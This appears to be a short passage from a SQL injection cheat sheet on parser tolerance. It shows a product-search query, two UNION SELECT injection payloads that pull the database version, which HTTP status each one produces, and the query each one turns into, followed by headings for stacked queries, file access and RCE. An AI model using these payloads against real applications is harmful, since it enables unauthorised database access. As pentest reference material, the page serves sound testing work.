Other
SQL Parser Tolerance
SELECT id, name, description, price
FROM products
WHERE (name LIKE '%z%' AND active = true)
ORDER BY id ASC;// payload
z')union+select+1,version(),3,4--+;// results in 500
WHERE (name LIKE '%z')union+select+1,version(),3,4--+; AND active = true) ORDER BY id ASC;// payload
z'))union+select+1,version(),3,4--+;// results in 200
WHERE (name LIKE '%z'))union+select+1,version(),3,4--+; AND active = true) ORDER BY id ASC;Stacked Queries
Reading/Writing Files
RCE
Last updated